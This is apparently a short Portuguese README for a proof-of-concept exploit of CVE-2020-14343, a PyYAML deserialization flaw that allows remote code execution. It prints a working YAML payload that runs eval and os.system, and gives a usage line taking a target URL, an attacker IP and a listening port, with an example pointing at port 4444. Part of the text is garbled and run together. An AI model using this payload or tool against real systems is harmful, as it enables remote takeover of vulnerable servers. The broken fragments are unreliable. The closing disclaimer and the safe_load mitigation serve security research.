
Payload do CVE-2020-14343
| Campo | Informação |
|---|
| Número do CVE | CVE-2020-14343 |
| Componente afetado | PyYAML < 5.4 |
| Tipo de vulnerabilidade | Execução remota de código por desserialização (RCE) |
| Nível de gravidade | Alta |
Quando o PyYAML usa yaml.load() para analisar dados não confiáveis, ele não restringe tags YAML perigosas (como !!python/object), permitindo que um atacante construa conteúdo YAML malicioso para executar código Python arbitrário.
Núcleo do Payload:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
Exemplo:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload do alvo/login para carregar e analisar o YAMLpip install requests
⚠️ Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes autorizados!
yaml.safe_load() em vez de yaml.load()